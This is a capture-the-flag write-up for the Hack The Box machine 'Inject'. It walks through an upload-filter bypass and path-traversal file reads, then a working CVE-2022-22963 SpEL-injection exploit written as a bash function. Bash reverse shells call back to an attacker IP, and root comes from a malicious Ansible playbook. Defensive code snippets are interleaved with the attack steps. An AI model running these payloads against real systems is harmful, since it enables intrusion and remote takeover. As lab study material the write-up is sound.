# Inject Write-Up

## Boot To Root

### Enumeration

Let's use RustScan for the initial enumeration.

{% code fullWidth="true" %}

```bash
rustscan -n --ulimit 10000 --scan-order "Random" -a inject.htb -- -A -sC
```

{% endcode %}

{% code fullWidth="true" %}

```bash
# Output of RustScan
PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIUJSpBOORoHb6HHQkePUztvh85c2F5k5zMDp+hjFhD8VRC2uKJni1FLYkxVPc/yY3Km7Sg1GzTyoGUxvy+EIsg=
|   256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICZzUvDL0INOklR7AH+iFw+uX+nkJtcw7V+1AsMO9P7p
8080/tcp open  nagios-nsca syn-ack Nagios NSCA
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

{% endcode %}

As we can see, there isn't much in terms of open ports: only SSH on 22 and a web service on 8080. Let's see what's on the other side of the website hosted on the machine.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FeW1lRanZp3CHXmx4UiwX%2F1.png?alt=media&#x26;token=00cf6f3c-8877-4f54-9bc4-d082634c9af3" alt=""><figcaption><p>homepage</p></figcaption></figure></div>

From here we have only two options: **Signup** and **Upload**.

While enumerating **Signup**, we hit a dead end 😟

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2F3FcAvUisfLVrR3SeCJYT%2FUntitled%201.png?alt=media&#x26;token=f3247739-b8ed-40d5-aa10-0d332a8515d5" alt=""><figcaption><p>dead end</p></figcaption></figure></div>

### Sub-Directory Enumeration

We are going to use feroxbuster for this job. I am using custom bash functions, so don't worry about the commands you see in the screenshots.

Here is the command you can actually use for the sub-directory enumeration; make sure to replace wordlist.txt with the wordlist you want to use.

{% code fullWidth="true" %}

```bash
feroxbuster -s "200,204,301,302,307,308,401,405" -t "600" --timeout 15 -u http://inject.htb -w wordlist.txt -e -x php,html,txt,sql,bak,tar,tar.gz,db,zip,sqlite,ticket,docx,json,aspx,jsp,war --auto-tune
```

{% endcode %}

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FkTSJzAMzm5lRLnnnb6Yf%2FUntitled%202.png?alt=media&#x26;token=27881dd2-7b69-4406-8ec0-75827762699f" alt=""><figcaption><p>ferrox in action</p></figcaption></figure></div>

Let's check the upload section.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FqtiBoCxQkBIwz6YQjfMZ%2FUntitled%203.png?alt=media&#x26;token=b4104439-3b66-4832-90c1-a0ef867b3926" alt=""><figcaption><p>upload section</p></figcaption></figure></div>

Try uploading any file and you will get an error stating that only image files can be uploaded. However, simply changing the file's extension lets you upload any file you want.

You don't have to manipulate the magic number to bypass the verification: just upload any file you want and make sure it has a .jpg extension, since only the extension is checked.
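Added example (not the box's code) of why the rename works: a validator that looks only at the extension accepts `evil.sh.jpg`, while one that also checks the file's leading magic bytes rejects it. The set of accepted image types is an assumption.

```python
from typing import Optional

# Magic numbers for the image types the form is assumed to accept (assumption, not from the box).
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}


def _ext(filename: str) -> str:
    """Lower-cased last extension, with 'jpeg' folded into 'jpg'."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return "jpg" if ext == "jpeg" else ext


def weak_is_image(filename: str, data: bytes) -> bool:
    """Extension-only check, the behaviour observed on the box: 'evil.sh.jpg' passes."""
    return _ext(filename) in ALLOWED_EXT


def sniff_type(data: bytes) -> Optional[str]:
    """Image type from the leading bytes, or None if no known magic matches."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def strong_is_image(filename: str, data: bytes) -> bool:
    """Hardened check: the extension must be allowed AND the content must carry the
    matching magic bytes, so a shell script renamed to .jpg is rejected."""
    ext = _ext(filename)
    if ext not in ALLOWED_EXT:
        return False
    return sniff_type(data) == ext


# Constructed inputs mirroring the write-up: a bash reverse shell renamed to .jpg, and a real JPEG header.
SCRIPT_AS_JPG = ("evil.sh.jpg", b"/bin/bash -i >& /dev/tcp/YOUR_HTB_IP/9999 0>&1\n")
REAL_JPG = ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")
```

A server that passes the strong check should still store the file under a generated name rather than the client-supplied one.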

However, if you want to enumerate the endpoint further, we can upload a sample image file and try to understand the path where it is being stored.

Let's try that.

<figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FWXhd2TbDrIb0956Qf1Xn%2FUntitled%204.png?alt=media&#x26;token=084f9631-6978-4371-a68b-df06ea38d93f" alt=""><figcaption><p>uploaded the file</p></figcaption></figure>

After uploading the file you will get a link to view it; click it and you will be taken to a new page.

Now notice the URL parameter that is being used.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FsHQbUObk7JWoOiubM3ej%2FUntitled%205.png?alt=media&#x26;token=052c2fce-1c00-4ebc-a0cc-236a120f271f" alt=""><figcaption><p>check the url</p></figcaption></figure></div>

### Local File Inclusion

Let's try enumerating for LFI.

We can use **ffuf** for this.

{% code fullWidth="true" %}

```bash
ffuf -w seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://target.local:8080/show_image\?img\=FUZZ -t 100 -c -fc 500,404
```

{% endcode %}

As we can see, we have multiple hits.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2Fhsct7PPI2wB60coCj7Pe%2FUntitled%206.png?alt=media&#x26;token=d9fd8d4c-a19c-4dee-91a0-8159cdb26e41" alt=""><figcaption><p>ffuf in action</p></figcaption></figure></div>

We can use any one of them; let's try it with curl and see what happens.

{% code fullWidth="true" %}

```bash
curl http://inject.htb:8080/show_image\?img\=../../../../../../../../../../../../../../../../../../../etc/passwd
```

{% endcode %}

We can now read the contents of the /etc/passwd file.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FdwluTrBajIDWmbMfGxHb%2FUntitled%207.png?alt=media&#x26;token=372964b2-6e84-44dc-a0b0-62d725430679" alt=""><figcaption><p>lfi exploitation</p></figcaption></figure></div>

Let's check for files in the web root directory, which by default is **/var/www**.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FTjod0yug4c5GzupxZKJK%2FUntitled%208.png?alt=media&#x26;token=5cdc4aae-b1bf-47e2-8596-5de45bab4fb0" alt=""><figcaption><p>/var/www</p></figcaption></figure></div>

**Hmmm,** looks like we have a Spring Boot project here.

The **pom.xml** file is the Maven project descriptor and lists the project's dependencies, so let's enumerate that.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FKvngPvjqcFpiliSaNh87%2FUntitled%209.png?alt=media&#x26;token=05755b93-02c3-4830-9ee8-90f52b68aa73" alt=""><figcaption><p>pom.xml</p></figcaption></figure></div>

We have multiple dependencies here; let's enumerate the first one.

Spring Cloud Function Web 3.2.2 looks very interesting.

A quick Google search for the exploit leads us to the exploit known as **spring4shell**, tracked as **CVE-2022-22963**.

[spring cloud function web 3.2.2 exploit - Google Search](https://www.google.com/search?q=spring+cloud+function+web+3.2.2+exploit\&ei=zdYlZMLoHJ7w4-EPvtKs4AU\&oq=spring+cloud+function+web+3.2.2+ex\&gs_lcp=Cgxnd3Mtd2l6LXNlcnAQAxgBMgUIIRCgATIFCCEQoAEyBQghEKABMgUIIRCgATIFCCEQoAEyBAghEBU6CwgAEIoFEIYDELADSgQIQRgBUNgEWNQHYMoYaAFwAHgAgAHDAYgB4AOSAQMwLjOYAQCgAQHIAQTAAQE\&sclient=gws-wiz-serp)

#### Exploit PoC

<https://github.com/me2nuk/CVE-2022-22963>

Using the knowledge from the PoC at the GitHub link, we can craft our own bash function to make a more interactive exploit:

{% code fullWidth="true" %}

```bash
spring4Shell () {
    if [[ -n "$1" && -n "$2" ]]; then
        # The routing-expression header is evaluated as a SpEL expression by the vulnerable version
        curl -X POST "$1/functionRouter" -H "spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec('$2')" --data-raw 'data' -v
    else
        # usageHelp is the author's own helper function and is not defined in this post
        echo -e "[*] CVE-2022-22963 Spring4Shell"
        echo -e "[*] Simple Remote Code Execution Exploit for Spring Cloud Function"
        echo -e "[!] spring4Shell http://target.com:8080 \"whoami '>' /tmp/pwned\"\n"
    fi
}
```

{% endcode %}
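From the defender's side, the request the function above sends is easy to spot: a `spring.cloud.function.routing-expression` header carrying a SpEL type reference. Added detection example (not from the box or the PoC); the JSON access-log lines are constructed, and the assumption that external clients never set this header legitimately is noted in the code.

```python
import json
import re
from typing import Dict, List, Tuple

HEADER = "spring.cloud.function.routing-expression"
# SpEL type reference as used in the exploit above, e.g. T(java.lang.Runtime); tolerate spacing/case.
SPEL_TYPE_REF = re.compile(r"\bT\s*\(\s*java\.", re.IGNORECASE)


def classify(entry: Dict) -> str:
    """'rce', 'suspicious' or 'benign' for one parsed access-log entry."""
    headers = {k.lower(): v for k, v in entry.get("headers", {}).items()}
    expr = headers.get(HEADER)
    if expr is None:
        return "benign"
    if SPEL_TYPE_REF.search(expr) or "getRuntime" in expr:
        return "rce"
    # Assumption: external clients never legitimately set the routing header,
    # so any other value is still worth a review.
    return "suspicious"


def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(source, path, verdict) for every non-benign JSON log line; unparsable lines are skipped."""
    findings = []
    for line in lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue
        verdict = classify(entry)
        if verdict != "benign":
            findings.append((entry.get("src", "?"), entry.get("path", "?"), verdict))
    return findings


# Constructed JSON access-log lines (not from the box); the third mirrors the
# header sent by the spring4Shell function above, with a mixed-case header name.
SAMPLE_LOG = [
    '{"src": "203.0.113.5", "method": "GET", "path": "/", "headers": {}}',
    '{"src": "203.0.113.5", "method": "POST", "path": "/functionRouter", '
    '"headers": {"spring.cloud.function.routing-expression": "uppercase"}}',
    '{"src": "203.0.113.5", "method": "POST", "path": "/functionRouter", "headers": '
    '{"Spring.Cloud.Function.Routing-Expression": '
    '"T(java.lang.Runtime).getRuntime().exec(\'whoami\')"}}',
    'not json at all',
]
```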

You can copy and paste this function into your **.bashrc**, **.zshrc** or whichever aliases file you use and source it, or just start a new terminal session.

{% code fullWidth="true" %}

```bash
source ~/.bashrc
# or
source ~/.zshrc
# or
source ~/.bash_aliases
```

{% endcode %}

Once done we can start our exploitation phase.

***

## Exploitation

To get a shell we need to upload our reverse shell via the upload method we discovered earlier. However, we don't know where it is being stored, so to get that information we can simply use curl to request a file that does not exist.

{% code fullWidth="true" %}

```bash
curl http://inject.htb:8080/show_image\?img\=../../../../../../../../../../../../../../../../../../../var/www/WebApp/xyx
```

{% endcode %}

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2F0lZmanWc2L2P2j8qucpU%2FUntitled%2010.png?alt=media&#x26;token=a349dd34-1756-4894-80d2-602985053a12" alt=""><figcaption><p>using curl</p></figcaption></figure></div>

We have an information disclosure here: the error message reveals where the files are being uploaded.

{% code fullWidth="true" %}

```bash
file:/var/www/WebApp/src/main/uploads/../.
```

{% endcode %}

Let's craft our reverse shell.

{% code fullWidth="true" %}

```bash
echo -e '/bin/bash -i >& /dev/tcp/YOUR_HTB_IP/9999 0>&1' > evil.sh.jpg
```

{% endcode %}

And upload this to the server via the upload method.

Now start a reverse shell handler in your terminal.

{% code fullWidth="true" %}

```bash
nc -lvkp 9999
```

{% endcode %}

Then execute it via the RCE exploit. Before you do that, you might want to check whether you receive a ping request from the target.

{% code fullWidth="true" %}

```bash
# First Setup TCPDump to listen for ping request
sudo tcpdump -i tun0 icmp
# Then execute a ping request from the target machine
spring4Shell http://target.local:8080 "ping -c 1 YOUR_HTB_IP"
```

{% endcode %}

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FSB3dOn91xPFq31KLEu70%2FUntitled%2011.png?alt=media&#x26;token=a34c4c43-3e3a-459b-b84d-5f08f3754eb4" alt=""><figcaption><p>open the shell</p></figcaption></figure></div>

If all goes well, we can start to execute our reverse shell.

{% code fullWidth="true" %}

```bash
# You can check if the is uploaded or not via the curl command that we used earlier
curl http://target.local:8080/show_image\?img\=../../../../../../var/www/WebApp/src/main/uploads
# If the script got removed from the system you need to upload it again before exploting the RCE
# Once ready start the exploitation
spring4Shell http://target.local:8080 "chmod +x /var/www/WebApp/src/main/uploads/evil.sh.jpg"
spring4Shell http://target.local:8080 "bash -c /var/www/WebApp/src/main/uploads/evil.sh.jpg"
```

{% endcode %}

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2Fgx5bSNKSsgERnZI6ABoh%2FUntitled%2012.png?alt=media&#x26;token=59dd19be-1696-46a5-b289-29367ab33227" alt=""><figcaption><p>getting the shell</p></figcaption></figure></div>

I have 2 separate windows open one to execute RCE and one to get the reverse shell.

{% code fullWidth="true" %}

```bash
# Upgrade the raw reverse shell to an interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=screen
```

{% endcode %}

***

## Privilege Escalation

First things first, try to get a better shell. For example, as the current user "frank", you can create an authorized\_keys file in the /home/frank/.ssh/ folder (create the .ssh folder if it does not exist) and add your own public key, which you can then use to authenticate via SSH.

Once that's done, we can check the .m2 folder for the Maven settings file, which contains credentials.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FjEYVb8gtDs3IHCx5hubD%2FUntitled%2013.png?alt=media&#x26;token=9b6704e5-e561-4336-ad5e-9f76637a50ff" alt=""><figcaption><p>privesc</p></figcaption></figure></div>

Escalate to the other user **"phil"** using the credentials in the settings.xml file.

{% code fullWidth="true" %}

```bash
# Switch User to Phil
su phil
# Get the user flag
cd /home/phil
cat user.txt
```

{% endcode %}

So how do we escalate from here? Let's use **pspy**, which you can upload via your own web server.

{% code fullWidth="true" %}

```bash
# On your machine: serve the directory that contains pspy
python3 -m http.server 69 --directory DIRECTORY_WHERE_PSPY_IS_LOCATED/

# Then on the victim machine
wget http://YOUR_HTB_IP:69/pspy
chmod +x pspy
./pspy | tee report.txt
```

{% endcode %}

Via pspy we can see that there is a cron job running which executes Ansible playbook files.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FT9pBNxPgNQreyUZf08rw%2FUntitled%2014.png?alt=media&#x26;token=b30051c9-9b3f-4ec2-85c5-d8d2d4f138ae" alt=""><figcaption><p>pspy in action</p></figcaption></figure></div>

If we can inject our own playbook file, we can get a root reverse shell.

We can use this template: <https://gist.githubusercontent.com/Reelix/32ccf1baaa3066654a460265fca53960/raw/7c61e2ec5c2261d525f4726e5d0511824ac0e15e/reverse-shell.yml>

Edit the file and upload it to **/opt/automation/tasks/evil.yml**.

{% code fullWidth="true" %}

```bash
# Edit the file as per following, and make sure to provide your own HTB IP, do not copy this comment                                                                             evil.yml                                                                                          
- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/YOUR_HTB_IP/6969 0>&1'
```

{% endcode %}
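The root cause here is a directory of root-executed playbooks that a low-privileged user can write to. Added example (not from the box) of the audit a defender would run over such a directory: every entry must be root-owned, not group/world writable and not a symlink. The tasks path is the one observed with pspy above; the temporary tree built by `demo_findings()` is constructed.

```python
import os
import stat
import tempfile
from typing import List

# Directory the cron-driven playbook run reads from, as observed with pspy above.
TASKS_DIR = "/opt/automation/tasks"


def check_entry(path: str, uid: int, mode: int) -> List[str]:
    """Findings for one directory entry given its owner uid and st_mode.
    Kept pure so it can be exercised without root-owned files on disk."""
    findings = []
    if stat.S_ISLNK(mode):
        findings.append(f"{path}: symlink, its target can be swapped")
    if uid != 0:
        findings.append(f"{path}: owned by uid {uid}, not root")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: group/world writable ({oct(mode & 0o777)})")
    return findings


def audit_playbook_dir(path: str) -> List[str]:
    """Walk `path`; every directory and file must pass check_entry, otherwise a
    local user can plant a playbook that the cron job runs as root."""
    findings: List[str] = []
    for root, _dirs, files in os.walk(path):
        for entry in [root] + [os.path.join(root, f) for f in files]:
            st = os.lstat(entry)
            findings.extend(check_entry(entry, st.st_uid, st.st_mode))
    return findings


def demo_findings() -> List[str]:
    """Constructed tree: a world-writable 'evil.yml' inside a temporary tasks directory."""
    tmp = tempfile.mkdtemp(prefix="tasks-")
    evil = os.path.join(tmp, "evil.yml")
    with open(evil, "w") as fh:
        fh.write("- hosts: localhost\n  tasks: []\n")
    os.chmod(evil, 0o666)
    return audit_playbook_dir(tmp)
```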

As you can see, I got root access after waiting for some time.

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2FhbkxMGtkOQ1z1mBUN6Vc%2FUntitled%2015.png?alt=media&#x26;token=2565767d-edad-4c7d-b680-80939be87621" alt=""><figcaption><p>listen for the call</p></figcaption></figure></div>

<div data-full-width="true"><figure><img src="https://3865883041-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqbibUCxJnVbTL6bbTZHc%2Fuploads%2Fz0a4Vy3VMWiuXg1OUyCx%2FUntitled%2016.png?alt=media&#x26;token=69654f00-6941-4020-8963-47c555481058" alt=""><figcaption><p>get the flag</p></figcaption></figure></div>

Thank you for reading my post, have a great rest of your day, and good hunting 😎
